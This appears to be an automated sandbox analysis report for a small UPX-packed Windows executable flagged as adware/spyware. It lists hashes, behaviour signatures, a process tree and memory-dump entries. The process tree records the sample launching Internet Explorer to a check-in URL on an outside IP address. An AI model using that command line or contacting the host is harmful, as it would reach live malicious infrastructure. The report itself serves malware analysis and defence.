Overview

overview

7

Static

static

7

4366d4199e...18.exe

windows7-x64

7

4366d4199e...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    142s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/07/2024, 21:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4366d4199e1f3b32e66bb9809e509db7_JaffaCakes118.exe

  • Size

    37KB

  • MD5

    4366d4199e1f3b32e66bb9809e509db7

  • SHA1

    2bee943c7b77c8ca045ee03bf733d69be00c0799

  • SHA256

    2f8191614ad9d27e6665e12533a3edf0eba1a3ad6a71a4c1877e6473b3e7966b

  • SHA512

    6a12b9e33a899f8b1bf4d983cfab4c525629e5099d61074eefea804cb8c0b3c2cfa4fd678aff31e5987d5b7e7828cb8a790eaa2b22f248dccb7cb664b9bb2db5

  • SSDEEP

    768:OnPW0Nuj2acEO3ZEywhyPG6DNGyDnsPRwdRCsfw1IKP4UEjxR:9aNarO3D/7DnawdTwOFUElR

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4366d4199e1f3b32e66bb9809e509db7_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\4366d4199e1f3b32e66bb9809e509db7_JaffaCakes118.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3684
    • \??\c:\program files\internet explorer\iexplore.exe
      iexplore.exe http://88.80.5.21/70/checkin.php?cid=16975827&aid=10086&time=C:\Users\Admin\AppData\Local\Temp\\1720905964&fw=0&v=70&m=0&vm=0
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1532
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1532 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4944

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UEL5ICRL\suggestions[1].en-US
    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

    Download Submit

  • memory/1532-36-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-41-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-5-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-9-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-10-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-13-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-12-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-18-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-20-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-21-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-31-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-30-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-32-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-33-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-35-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-29-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-43-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-42-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-44-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-45-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-40-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-2-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-3-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-34-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-54-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-26-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-24-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-22-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-19-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-16-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-14-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-11-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-8-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-7-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-6-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-50-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-51-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-56-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-28-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-53-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-52-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-57-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-64-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/1532-68-0x00007FFAB3B70000-0x00007FFAB3BDE000-memory.dmp

    Filesize

    440KB

    Download

  • memory/3684-84-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3684-0-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

    Download